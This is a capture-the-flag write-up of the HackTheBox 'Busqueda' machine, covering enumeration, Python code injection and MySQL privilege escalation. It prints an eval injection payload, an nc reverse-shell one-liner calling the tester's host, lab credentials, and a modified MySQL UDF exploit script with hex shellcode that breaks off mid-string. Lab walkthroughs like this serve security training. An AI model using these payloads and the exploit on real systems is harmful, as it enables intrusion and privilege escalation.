DevSecOps
Home About Writings Talks Life
DevSecOps

HTB Busqueda | Linux Easy

HackTheBox Busqueda is an Easy rated Linux machine. This machine plagued with OWASP injection(A03:2021) and security misconfiguration(A05:2021) emphasises the need for specifying absolute paths to file and defining access control.

Attack Chain: The attacker begins by exploiting a code injection vulnerability within the python application. And after gaining a foothold exploited a house keeping script to escalate their privilege.

Initialization

1
2

# connect to vpn
sudo openvpn --auth-nocache --config lab_connection.ovpn

Enumeration

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

# discover ports and services
sudo nmap -F -Pn -sSUV --script 'default,exploit' -vvv 10.10.11.208 -oA nmap_busqueda
xsltproc nmap_busqueda.xml -o nmap_busqueda.html    # converts xml to html
firefox nmap_busqueda.html                        # view in browser
#-snip-#
22/tcp  open  OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 
80/tcp  open  Apache httpd 2.4.52(OPTIONS HEAD GET )

# discover technologies used
whatweb 10.10.11.208      # if domain exits add to host file and rerun command
#-snip-#
HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)]
RedirectLocation[http://searcher.htb/]

Bootstrap[4.1.3]
HTTPServer[Werkzeug/2.1.2 Python/3.10.6]
JQuery[3.2.1]
Python[3.10.6]
Werkzeug[2.1.2]

# add the domain to hosts file
echo '10.10.11.208 searcher.htb' | sudo tee -a /etc/hosts

# investigate existing headers
curl -I http://searcher.htb/
#-snip-#
HTTP/1.1 200 OK
Date: Wed, 12 Apr 2023 10:19:18 GMT
Server: Werkzeug/2.1.2 Python/3.10.6
Content-Type: text/html; charset=utf-8
Content-Length: 13519

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# discover subdomains
# with ffuf
ffuf -c -u http://searcher.htb/ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H 'Host: FUZZ.searcher.htb' -t 50 -ac -s 

# with gobuster
gobuster vhost -u http://10.10.11.208/ -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -t 50

gobuster dns -d searcher.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 50

# wfuzz
wfuzz -c -t 50 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://searcher.htb/ -H 'Host: FUZZ.searcher.htb' --hc '302'

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

# discover directories
# with ffuf
ffuf -c -u http://searcher.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 50 -ac -s
#-snip-#
search

# with gobuster
gobuster dir -u http://searcher.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -t 50
#-snip-#
/search    405

# with dirsearch
dirsearch -u http://searcher.htb/ -t 50 -q -r
#-snip-#
/search  405

# with wfuzz
wfuzz -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -t 50 -u http://searcher.htb/FUZZ --hc 404
#-snip-#
/  200

Exploration

Investigated the site and /search to find that it is an app that takes a word/sentence and searches the same against a selected search engine. Scanned the site using Burp suite and it suggested a Python Code Injection. Further research returned this resource Exploiting Python Code Injection in Web Applications .

/images/busqueda/busqueda01.png
Searcher Homepage

/images/busqueda/busqueda02.png
Searcher Code Injection Discovered

Exploitation

Leveraged on Burp suite to apply the payload that gained a foothold on the machine. I adapted the payload '+eval(compile('for x in range(1):\n import os\n os.system("cat /etc/passwd")','a','single'))+' to disclose the /etc/passwd file. And then improved on the payload '+eval(compile("""__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.48 9011 >/tmp/f')""",'','single'))+' urlencoding it to get a shell on the machine.

/images/busqueda/busqueda03.png
Searcher Foothold

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

# upgrade to a full tty
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; 

ls -lah
#-snip-#
-rw-r--r-- 1 www-data www-data 1.1K Dec  1 14:22 app.py
drwxr-xr-x 8 www-data www-data 4.0K Apr 12 09:39 .git
drwxr-xr-x 2 www-data www-data 4.0K Dec  1 14:35 templates

ls -lah .git
#-snip-#
-rw-r--r-- 1 www-data www-data  294 Dec  1 14:35 config
-rw-r--r-- 1 www-data www-data   73 Dec  1 14:35 description
-rw-r--r-- 1 www-data www-data   21 Dec  1 14:35 HEAD
drwxr-xr-x 2 www-data www-data 4.0K Dec  1 14:35 hooks

cat .git/config
#-snip-#
[remote "origin"]
	url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

cd ~        # change to shell user home directory
ls -lah
#-snip-#
-rw-rw-r-- 1 svc  svc    76 Apr  3 08:58 .gitconfig
drwxrwxr-x 5 svc  svc  4.0K Jun 15  2022 .local
lrwxrwxrwx 1 root root    9 Apr  3 08:58 .mysql_history -> /dev/null
-rw-r--r-- 1 svc  svc   807 Jan  6  2022 .profile
lrwxrwxrwx 1 root root    9 Feb 20 14:08 .searchor-history.json -> /dev/null
-rw-r----- 1 root svc    33 Apr 11 09:54 user.txt

cat user.txt   # capture the user flag
Escalation
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243

ss -tlpn
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process                                                  
LISTEN 0      128        127.0.0.1:5000       0.0.0.0:*    users:(("python3",pid=1492,fd=6),("python3",pid=1492,fd=4)) 
LISTEN 0      4096       127.0.0.1:3306       0.0.0.0:*                                                            
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*                                                            
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*                                                            
LISTEN 0      4096       127.0.0.1:3000       0.0.0.0:*                                                            
LISTEN 0      4096       127.0.0.1:39611      0.0.0.0:*                                                            
LISTEN 0      4096       127.0.0.1:222        0.0.0.0:*                                                            
LISTEN 0      511                *:80               *:*                                                            
LISTEN 0      128             [::]:22            [::]:*      

sudo -l     # on prompt submit: jh1usoih2bkjaspwe92
#-snip-#
User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *

# ssh into the box as svc user with the above password
ssh svc@searcher.htb  # on prompt submit: jh1usoih2bkjaspwe92

sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
#-snip-#
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
 docker-ps     : List running docker containers
 docker-inspect : Inpect a certain docker container
 full-checkup  : Run a full system checkup

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
#-snip-#
CONTAINER ID   IMAGE                COMMAND                  CREATED        STATUS       PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   3 months ago   Up 3 hours   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   3 months ago   Up 3 hours   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' f84
#-snip-# stored as mysql_container_data
"MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
"MYSQL_USER=gitea",
"MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
"MYSQL_DATABASE=gitea",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"GOSU_VERSION=1.14",
"MYSQL_MAJOR=8.0",
"MYSQL_VERSION=8.0.31-1.el8",
"MYSQL_SHELL_VERSION=8.0.31-1.el8"

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' 960
#-snip-# stored as gitea_container_data
"USER_UID=115",
"USER_GID=121",
"GITEA__database__DB_TYPE=mysql",
"GITEA__database__HOST=db:3306",
"GITEA__database__NAME=gitea",
"GITEA__database__USER=gitea",
"GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"USER=git",
"GITEA_CUSTOM=/data/gitea"

sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
#-snip-#
Something went wrong

ls -lah /opt/scripts/
#-snip-# cannot read the files in this directory
-rwx--x--x 1 root root  586 Dec 24 21:23 check-ports.py
-rwx--x--x 1 root root  857 Dec 24 21:23 full-checkup.sh
drwxr-x--- 8 root root 4.0K Apr  3 15:04 .git
-rwx--x--x 1 root root 3.3K Dec 24 21:23 install-flask.sh
-rwx--x--x 1 root root 1.9K Dec 24 21:23 system-checkup.py

# investigated the database
mysql -h 127.0.0.1 -u gitea -pyuiu1hoiu4i5ho1uh gitea

show databases;
+--------------------+
| Database           |
+--------------------+
| gitea              |
| information_schema |
| performance_schema |
+--------------------+

show tables;
+---------------------------+
| Tables_in_gitea           |
+---------------------------+
| access                    |
| access_token              |
| action                    |
| app_state                 |
| attachment                |
| badge                     |
| collaboration             |
| comment                   |
| commit_status             |
| commit_status_index       |
| deleted_branch            |
| deploy_key                |
| email_address             |
| email_hash                |
| external_login_user       |
| follow                    |
| foreign_reference         |
| gpg_key                   |
| gpg_key_import            |
| hook_task                 |
| issue                     |
| issue_assignees           |
| issue_content_history     |
| issue_dependency          |
| issue_index               |
| issue_label               |
| issue_user                |
| issue_watch               |
| label                     |
| language_stat             |
| lfs_lock                  |
| lfs_meta_object           |
| login_source              |
| milestone                 |
| mirror                    |
| notice                    |
| notification              |
| oauth2_application        |
| oauth2_authorization_code |
| oauth2_grant              |
| org_user                  |
| package                   |
| package_blob              |
| package_blob_upload       |
| package_file              |
| package_property          |
| package_version           |
| project                   |
| project_board             |
| project_issue             |
| protected_branch          |
| protected_tag             |
| public_key                |
| pull_auto_merge           |
| pull_request              |
| push_mirror               |
| reaction                  |
| release                   |
| renamed_branch            |
| repo_archiver             |
| repo_indexer_status       |
| repo_redirect             |
| repo_topic                |
| repo_transfer             |
| repo_unit                 |
| repository                |
| review                    |
| review_state              |
| session                   |
| star                      |
| stopwatch                 |
| system_setting            |
| task                      |
| team                      |
| team_invite               |
| team_repo                 |
| team_unit                 |
| team_user                 |
| topic                     |
| tracked_time              |
| two_factor                |
| upload                    |
| user                      |
| user_badge                |
| user_open_id              |
| user_redirect             |
| user_setting              |
| version                   |
| watch                     |
| webauthn_credential       |
| webhook                   |
+---------------------------+

pager less -SFX
describe user;
+--------------------------------+---------------+------+-----+---------+----->
| Field                          | Type          | Null | Key | Default | Extr>
+--------------------------------+---------------+------+-----+---------+----->
| id                             | bigint        | NO   | PRI | NULL    | auto>
| lower_name                     | varchar(255)  | NO   | UNI | NULL    |     >
| name                           | varchar(255)  | NO   | UNI | NULL    |     >
| full_name                      | varchar(255)  | YES  |     | NULL    |     >
| email                          | varchar(255)  | NO   |     | NULL    |     >
| keep_email_private             | tinyint(1)    | YES  |     | NULL    |     >
| email_notifications_preference | varchar(20)   | NO   |     | enabled |     >
| passwd                         | varchar(255)  | NO   |     | NULL    |     >
| passwd_hash_algo               | varchar(255)  | NO   |     | argon2  |     >
| must_change_password           | tinyint(1)    | NO   |     | 0       |     >
| login_type                     | int           | YES  |     | NULL    |     >
| login_source                   | bigint        | NO   |     | 0       |     >
| login_name                     | varchar(255)  | YES  |     | NULL    |     >
| type                           | int           | YES  |     | NULL    |     >
| location                       | varchar(255)  | YES  |     | NULL    |     >
| website                        | varchar(255)  | YES  |     | NULL    |
| rands                          | varchar(32)   | YES  |     | NULL    |     >
| salt                           | varchar(32)   | YES  |     | NULL    |     >
| language                       | varchar(5)    | YES  |     | NULL    |     >
| description                    | varchar(255)  | YES  |     | NULL    |     >
| created_unix                   | bigint        | YES  | MUL | NULL    |     >
| updated_unix                   | bigint        | YES  | MUL | NULL    |     >
| last_login_unix                | bigint        | YES  | MUL | NULL    |     >
| last_repo_visibility           | tinyint(1)    | YES  |     | NULL    |     >
| max_repo_creation              | int           | NO   |     | -1      |     >
| is_active                      | tinyint(1)    | YES  | MUL | NULL    |     >
| is_admin                       | tinyint(1)    | YES  |     | NULL    |     >
| is_restricted                  | tinyint(1)    | NO   |     | 0       |     >
| allow_git_hook                 | tinyint(1)    | YES  |     | NULL    |     >
| allow_import_local             | tinyint(1)    | YES  |     | NULL    |     >
| allow_create_organization      | tinyint(1)    | YES  |     | 1       |     >
| prohibit_login                 | tinyint(1)    | NO   |     | 0       |     >
| avatar                         | varchar(2048) | NO   |     | NULL    |     >
| avatar_email                   | varchar(255)  | NO   |     | NULL    |     >
| use_custom_avatar              | tinyint(1)    | YES  |     | NULL    |     >
| num_followers                  | int           | YES  |     | NULL    |     >
| num_following                  | int           | NO   |     | 0       |     >
| num_stars                      | int           | YES  |     | NULL    |     >
| num_repos                      | int           | YES  |     | NULL    |     >
| num_teams                      | int           | YES  |     | NULL    |     >
| num_members                    | int           | YES  |     | NULL    |     >
| visibility                     | int           | NO   |     | 0       |     >
| repo_admin_change_team_access  | tinyint(1)    | NO   |     | 0       |     >
| diff_view_style                | varchar(255)  | NO   |     |         |     >
| theme                          | varchar(255)  | NO   |     |         |     >
| keep_activity_private          | tinyint(1)    | NO   |     | 0       |     >
+--------------------------------+---------------+------+-----+---------+-----

select name,passwd,salt from user;
#-snip-# stored as gitea_users_creds
+---------------+------------------------------------------------------------------------------------------------------+----------------------------------+
| name          | passwd                                                                                               | salt                             |
+---------------+------------------------------------------------------------------------------------------------------+----------------------------------+
| administrator | ba598d99c2202491d36ecf13d5c28b74e2738b07286edc7388a2fc870196f6c4da6565ad9ff68b1d28a31eeedb1554b5dcc2 | a378d3f64143b284f104c926b8b49dfb |
| cody          | b1f895e8efe070e184e5539bc5d93b362b246db67f3a2b6992f37888cb778e844c0017da8fe89dd784be35da9a337609e82e | d1db0a75a18e50de754be2aafcad5533 |
+---------------+------------------------------------------------------------------------------------------------------+----------------------------------+

\quit
# passed on cracking the password but would have eventually towed that route

I veered towards executing a local privilege escalation since I had mysql root user password. Downloaded 46249 exploit and modified the exploit appropriately.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# checked for the mysql version and plugin directory details
mysql -h 127.0.0.1 -u root -pjI86kGUuj87guWr3RyF -e "show variables like '%version%';"
mysql -h 127.0.0.1 -u root -pjI86kGUuj87guWr3RyF -e "show variables like '%plugin%';"

# dumped the database using the root user in case I needed to look closely
mysqldump -h 127.0.0.1 -u root -pjI86kGUuj87guWr3RyF -d gitea --result-file=dump.sql

# installed 2to3 and converted the exploit from python2 to python3
sudo apt install 2to3
2to3 46249.py   # upload to the victim machine after making appropriate modifications

modified 46249.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116

# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit
# Date: 24/01/2019
# Exploit Author: d7x
# Vendor Homepage: https://www.mysql.com
# Software Link: www.mysql.com
# Version: MySQL 4.x/5.x
# Tested on: Debian GNU/Linux 8.11 / mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3
# CVE : N/A

'''
*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function local privilege escalation exploit ***


UDF lib shellcodes retrieved from metasploit
(there are windows .dll libraries within metasploit as well so this could be easily ported to Windows)

Based on the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518)
CVE: N/A
References:
https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html
https://www.exploit-db.com/exploits/1518
https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith)

Tested on 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
'''


import sys
import subprocess
import platform, random
import argparse
import os
import re
import pty

shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e7040000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb00000000000000230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d00000300e0010000100000001169690d00000200ea01000000000000040b000008000000b70b000008000000e70b000008000000110c000008000000220c000008000000550c0000080000008e0c000008000000ac0c000008000000d90c00000800000004110000080000006b0a0000020f00007c0a000002030000960a000002020000ad0a000002090000430b000002090000bc0a0000020c0000e40a0000020e0000f30a0000020e00003f0c0000020e00000e0b000002010000310b000002060000560b0000020a0000680b000002120000bf0b0000020d0000ef0b0000020d00005b0c0000020d0000960c0000020d0000b20c0000020d0000e10c0000020d0000fd0c000002080000580d000002110000770d0000020b00008e0d000002070000e410000006040000e810000006050000ec10000006100000fc1000000704000000110000071000005589e55383ec04e8000000005b81c3d40700008b93f4ffffff85d27405e81e000000e8b9000000e884040000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff5589e55653e8ad00000081c37607000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8bcffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c3f706000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35531c089e55dc35589e55dc35589e557565383ec0cfc83c9ff8b750c8b46088b3831c0f2aef7d18d59ffe8fcffffff83f8007c53753f83ec0c6a1ee8fcffffff5f596a006a00486a218d1418f7d06a0721d0506a00e8fcffffff83c42083f8ff89c7742351538b4608ff3057e8fcffffffffd7eb0b526a016a0050e8fcffffff31c083c410eb05b8010000008d65f45b5e5f5dc35589e557565383ec18fc6800040000e8fcffffffc70424010000008945e8e8fcffffffc6000089c68b450c595b31db68840e00008b4008ff30e8fcffffff8945eceb338b7de831c083c9fff2ae5252f7d18d79ff8d043b50568945f0e8fcffffff83c40c57ff75e889c68d041850e8fcffffff8b5df083c40cff75ec6a04ff75e8e8fcffffff83c41085c075b683ec0cff75ece8fcffffff83c410803e0075088b4518c60001eb16c6441eff0031c083c9ff89f7f2ae8b4514f7d14989088d65f489f05b5e5f5dc35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e55383ec048b550c8b5d10833a0274095050683f0e0000eb428b420483380074095050685e0e0000eb318b520c83ec0cc74004000000008b0283c00203420450e8fcffffff8b550883c41089420c31d285c07512505068860e000053e8fcffffffb20183c41088d08b5dfcc9c35589e583ec088b450c83380175128b4004833800750a8b4508c6000131c0eb14505068140e0000ff7510e8fcffffffb00183c410c9c35589e55383ec0c8b5d1068a00e000053e8fcffffff8b4514c7001e00000089d88b5dfcc9c35531d289e583ec088b450c8338007414525268bf0e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec148b450c8b4008ff30e8fcffffffc999c35589e557565383ec10fc8b550c8b45088b580c8b420c89df8b088d440b018945e88b42088b30f3a48b420c8b00c60403008b42088b4a0c8b7de88b70048b4904f3a48b420c8b55e88b4004c60402006a015253e8fcffffff8d65f45b5e5f5d99c35589e58b45088b400c85c074098945085de9fcffffff5dc35589e55783ec10fc8b450c8b4008ff30e8fcffffff83c41085c089c275088b4518c60001eb1131c083c9ff89d7f2ae8b4514f7d149890889d08b7dfcc9c390909090905589e55653e85dfcffff81c3260300008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c3ec020000e860fbffff595bc9c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000b20100000c000000100900000d000000f80d000004000000b4000000f5feff6ff8010000050000005805000006000000b80200000a000000f40100000b0000001000000003000000f010000002000000100000001400000011000000170000000009000011000000e0070000120000002001000013000000080000001600000000000000feffff6fa0070000ffffff6f01000000f0ffff6f4c070000faffff6f0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000b4000000b400000044010000030000000000000004000000040000000b000000f6ffff6f02000000f8010000f8010000c000000003000000000000000400000004000000150000000b00000002000000b8020000b8020000a0020000040000000100000004000000100000001d00000003000000020000005805000058050000f40100000000000000000000010000000000000025000000ffffff6f020000004c0700004c070000540000000300000000000000020000000200000032000000feffff6f02000000a0070000a00700004000000004000000010000000400000000000000410000000900000002000000e0070000e007000020010000030000000000000004000000080000004a0000000900000002000000000900000009000010000000030000000a0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004e000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005f0000000100000006000000f80d0000f80d00001c00000000000000000000000400000000000000650000000100000032000000140e0000140e0000dd000000000000000000000001000000010000006d0000000100000002000000f40e0000f40e00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007e000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008a00000006000000030000001410000014100000d000000004000000000000000400000008000000930000000100000003000000e4100000e41000000c00000000000000000000000400000004000000980000000100000003000000f0100000f01000001400000000000000000000000400000004000000a1000000010000000300000004110000041100000400000000000000000000000400000000000000a7000000080000000300000008110000081100000800000000000000000000000400000000000000ac000000010000000000000000000000081100009b0000000000000000000000010000000000000001000000030000000000000000000000a3110000b500000000000000000000000100000000000000";
shellcode_x64 = "7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000